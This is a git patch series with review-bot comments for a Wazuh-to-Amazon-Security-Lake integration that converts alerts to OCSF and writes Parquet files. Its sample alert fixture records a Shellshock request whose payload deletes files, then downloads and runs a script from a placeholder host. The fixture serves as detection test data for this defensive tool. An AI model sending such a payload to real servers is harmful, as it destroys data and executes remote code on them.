@@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From eb7ace3c3c4a02388596c36584766deb06a902da Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 32/77] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json 
@@ -0,0 +1,42 @@ +{ + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "state_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.type" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } +} diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 2b8a1de14755b..d125a2ff6d56b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
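Review bot: Both `risk_score` and `severity_id` are mapped verbatim from `rule.level`, but `severity_id` is an OCSF enumeration — the converter added later in this series documents it as "the 0-6 range, required by OCSF" — so Wazuh levels above 6 produce out-of-range values; this needs a normalisation step, not a field copy. `data_sources` is the one entry whose value is a list rather than a dotted path, and the consumer in `map_to_ocsf` (`@@ -11,17 +11,30 @@`) calls `.split('.')` on every value, which raises on a list; either document that a list means "collect these fields" and handle it there, or drop the entry. `metadata.product.version` is pinned to `"4.9.0"`, a value that will drift from the running version and that the later converter deliberately omits for that reason.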
@@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) 
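Review bot: `map_to_ocsf` cannot run as written: `dotted_destination.split('.')` references an undefined name (the variable is `dotted_destination_field`), `len(depth_levels>1)` compares a list to an int before `len` and raises TypeError, and the populated `ocsf_alert` is never returned, so callers get `None`. Direct indexing `alert_dictionary[depth_levels[0]]` also raises KeyError for any source field absent from a given alert, and the list-valued `data_sources` entry in the mapping file has no `.split`. The name is misleading as well: the mapping value is the *source* path inside the Wazuh alert, not the destination. A rewrite that walks each path defensively and returns the result follows.
```python
def map_to_ocsf(alert_dictionary, ocsf_mapping_filename):
    """Return an OCSF-shaped dict built from a Wazuh alert via the JSON mapping file.

    Mapping values are dotted paths into the alert (or a list of them); a path
    that is absent from this alert maps to None instead of raising.
    """
    with open(ocsf_mapping_filename) as jsonfile:
        mappings = json.load(jsonfile)

    def lookup(dotted_source_path):
        current_level = alert_dictionary
        for field in dotted_source_path.split('.'):
            if not isinstance(current_level, dict):
                return None
            current_level = current_level.get(field)
        return current_level

    ### Put constants into the output alert
    ocsf_alert = {}
    ocsf_alert |= mappings['constants']
    for key, source in mappings['mappings'].items():
        # A list value (e.g. data_sources) collects several source fields.
        if isinstance(source, list):
            ocsf_alert[key] = [lookup(path) for path in source]
        else:
            ocsf_alert[key] = lookup(source)
    return ocsf_alert
```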
@@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From 3d7b8ff585d5680fce00a5cdf60bbce2b3c5307f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 33/77] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 545f855a679015d214c04588fb7758311701cc0c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 34/77] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) 
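Review bot: The default `'ocsf-mapping.json'` for `-x/--mapping` is resolved against the current working directory, not the script's location, so the pipeline only finds the file when launched from `integrations/`; under a service manager the cwd is usually elsewhere. Anchor it to the script: `default=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ocsf-mapping.json')` (`os` is already imported). Since this file decides which alert fields reach the bucket, it should be owned by the deploying user and not writable by the process's peers. `parse_arguments` starts outside the hunk.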
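Review bot: Renaming the loop variable to `line` makes it the same name that `fileobject.readline()` overwrites on the next statement, and the new `alert = json.loads(line)` is assigned but never used — the append still parses the line a second time with `json.loads(line)`. Use a throwaway index and the parsed value: `for _ in range(length):` and `output.append(alert)`. A `JSONDecodeError` from a malformed line is still unhandled here, as raised on `@@ -19,12 +22,12 @@`.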
diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): 
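Review bot: The first statement under the new signature, `ocsf_output = {}`, rebinds the parameter to a fresh local dict, so everything written into `ocsf_output` afterwards is lost and the caller's `ocsf_mapped_alert` stays empty; the function neither mutates the passed dict nor returns anything. Drop that line and mutate in place (`ocsf_output.clear()` first if reuse is intended), or return `ocsf_output` and assign at the call site in `@@ -38,17 +36,19 @@`. The `len(depth_levels>1)` TypeError visible as context in `@@ -27,7 +25,7 @@` and the undefined `dotted_destination` raised on `@@ -11,17 +11,30 @@` are still present.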
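Review bot: `map_to_ocsf(alert, mappings, ocsf_mapped_alert):` ends with a colon, which is a SyntaxError, so the module does not import. Even with the colon removed, `ocsf_mapped_alert` is still `{}` after the call because `map_to_ocsf` rebinds its output parameter (see `@@ -13,12 +13,10 @@`), so every row pushed to the bucket would be empty. The `for line in range(0, length)` shadowing from the previous commit also survives the rename to `map_block`; `for _ in range(length)` plus `ocsf_mapped_alert = map_to_ocsf(alert, mappings)` with a function that returns its result would read cleanly.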
@@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From f753b1235f54b6b94dc94f242808256829e40e94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 35/77] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file 
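Review bot: `open(ocsf_mapping_filename)` references a name that is never defined — the option added in `@@ -49,6 +62,7 @@` is `args.mapping` — so the script raises NameError before reading any input, and because it sits inside the `try: ... except Exception` the failure surfaces only as "Error running script" in the log. Use `with open(args.mapping) as jsonfile: mappings = json.load(jsonfile)` and log the exception itself with `logging.exception(...)` in that handler. The adjacent context line `os.fdopen(sys.stdin.fileno(), 'rt', buffering=0)` is a problem on its own: unbuffered mode is only allowed for binary streams, and text mode with `buffering=0` raises ValueError. The enclosing `__main__` block starts and ends outside the hunk.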
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py 
@@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json 
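Review bot: `convert` indexes every field with `event["_source"][...]` directly, so an alert lacking any of the paths it touches — `rule.mitre`, `rule.nist_800_53`, `full_log`, `manager.name`, which presumably not every rule populates — raises KeyError; the sample shipped in this commit happens to carry them all, which hides the problem. A small path helper that returns a default (a `get_path(event, "rule.mitre.tactic", default=[])` walking the keys with `.get`) would let the template degrade to empty values instead. `normalize` is a stub returning the raw level, so `severity_id` exceeds the 0–6 range its own docstring requires, and `"vendor_name": "Wazuh, Inc,."` carries a stray comma. The module-level `event = {}` is dead code shadowed by the parameter.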
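Review bot: The test script only writes `wazuh-event.ocsf.json` and prints "Done"; it never inspects the converted document, so a regression in `convert` passes as long as no exception is raised. Check at least the fixed fields before writing, e.g. `assert converted_event["class_uid"] == 2004` and `assert converted_event["severity_id"] <= 6`. Both file paths are relative to the cwd, so the script only works when run from the `ocsf/` directory; `Path(__file__).parent / "wazuh-event.sample.json"` removes that dependency.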
@@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From dcc119e07edfff1c99655a0755c9632662a662fb Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 36/77] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 + .../{ => logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf 
+++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. 
@@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." 
+ { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py 
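Review bot: The new `join` helper flattens `rule.mitre.tactic`, `rule.mitre.technique` and `rule.mitre.id` into single comma-separated strings, so a rule with two techniques yields one `technique` object whose `uid` is `"T1068,T1190"`; as far as I recall the OCSF schema, `finding_info.attacks` is an array of attack objects, so one object per technique keeps the IDs queryable. If the three lists are parallel (they are in the sample), `[{"tactic": {"name": t}, "technique": {"name": n, "uid": i}, "version": "v13.1"} for t, n, i in zip(...)]` does that. `join` still raises KeyError on alerts without `rule.mitre`, as raised on the previous hunk of this file, and the typo `"Wazuh, Inc,."` survives the rewrite.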
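Review bot: `Parquet.to_s3` is a `pass` stub, so a caller that believes it uploaded gets silent success; make it `raise NotImplementedError` until the S3 path exists. `encode` builds the table with `pa.Table.from_pydict`, which expects a column-oriented dict of lists, while `parquet/test.py` bypasses `encode` and calls `pa.Table.from_pylist` on a list of row dicts — pick one representation and route the test through `encode`. The commented-out `pq.write_to_dataset` line should go; version control keeps the alternative.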
@@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From 5c5ff2460219e16dae716f2b4cb3e4b4e493b391 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 37/77] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore 
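Review bot: `Parquet.to_file(table, "output/wazuh-event.ocsf.parquet")` writes into `output/`, a directory nothing in this commit creates, so the script fails on a fresh checkout (pyarrow does not create the parent directory; `.gitignore` excludes `*.parquet` but does not add the folder). Create it first with `Path("output").mkdir(exist_ok=True)` and derive paths from `Path(__file__).parent` rather than the cwd. `import pyarrow as pa` is only needed to sidestep `Parquet.encode`; going through `encode` would actually exercise the module under test.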
@@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 
